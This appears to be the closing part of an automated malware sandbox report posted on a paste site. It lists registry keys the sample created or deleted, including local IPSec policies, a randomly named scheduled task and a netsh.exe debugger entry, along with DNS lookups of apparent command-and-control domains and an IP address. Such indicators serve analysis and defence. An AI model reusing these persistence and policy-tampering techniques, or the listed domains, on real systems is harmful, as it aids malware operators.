- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecISAKMPReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyb5e56c59-4c46-497c-bb2e-021a1896c6fc\\ipsecNFAReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Path",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ujqftiylp\\Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ujqftiylp\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\371C7AE0-E7B0-4535-8AD0-2D046DB26874\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\PreviousServiceShutdown",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update\\UAS\\UpdateCount",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\StoreLocation",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecFilterReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy281d3644-43fc-42b7-b38b-3f7de24b37ff\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAed906de2-c3de-49c9-8058-4aec3cb1707a\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy5f5e7458-9add-49cd-8656-e53a7254124c\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ujqftiylp.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ujqftiylp.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter9363f1a6-96d3-4319-a4bb-4cca7f3bdcaa\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA6e2a4060-aee0-4140-a9bd-0f258a2b63bf\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy48126062-f560-4993-8144-b9b0c91d5607\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode"
- * DNS Communications:
- "type": "A",
- "request": "aj.0x0x0x0x0.best",
- "answers":
- "type": "A",
- "request": "xs.0x0x0x0x0.club",
- "answers":
- "type": "A",
- "request": "ui.0x0x0x0x0.xyz",
- "answers":
- "type": "A",
- "request": "qb.1c1c1c1c.best",
- "answers":
- "type": "A",
- "request": "rp.oiwcvbnc2e.stream",
- "answers":
- * Domains:
- "ip": "31.214.157.85",
- "domain": "xs.0x0x0x0x0.club"
- "ip": "",
- "domain": "rp.oiwcvbnc2e.stream"
- "ip": "",
- "domain": "aj.0x0x0x0x0.best"
- "ip": "31.214.157.85",
- "domain": "ui.0x0x0x0x0.xyz"
- "ip": "31.214.157.85",
- "domain": "qb.1c1c1c1c.best"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment